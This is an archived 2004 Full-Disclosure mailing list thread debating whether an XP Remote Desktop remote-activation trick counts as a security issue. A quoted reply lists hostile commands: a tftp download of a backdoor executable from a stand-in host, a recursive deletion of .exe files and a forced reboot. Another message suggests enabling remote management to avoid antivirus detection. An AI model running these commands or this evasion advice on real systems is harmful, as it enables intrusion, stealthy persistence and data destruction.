| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <001b01c4a8a8$3c55e210$4802a8c0@Security> From: joel at helgeson.com (Joel R. Helgeson) Subject: XP Remote Desktop Remote Activation If someone installs a backdoor, that can be detected by AV scanner. If you gain temporary shell, open up the management interface, you'll have full control of the box without anyone becoming the wiser. Joel R. Helgeson Director of Networking & Security Services SymetriQ Corporation "Give a man fire, and he'll be warm for a day; set a man on fire, and he'll be warm for the rest of his life." ----- Original Message ----- From: "morning_wood" <se_cur_ity@...mail.com> To: "Fixer" <fixer907@...il.com>; <full-disclosure@...ts.netsys.com> Sent: Saturday, October 02, 2004 11:05 AM Subject: Re: [Full-Disclosure] XP Remote Desktop Remote Activation >> a malicious user who has already gained a command shell to activate > > umm... you already own the box. > try... > tftp -i yourhost get evilbackdoor.exe ( vnc mabey ) > > or > > c:\del *.exe /s > c:\shutdown -r > > I realy do not see the SECURITY ISSUE here. > > > cheers, > m.wood > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists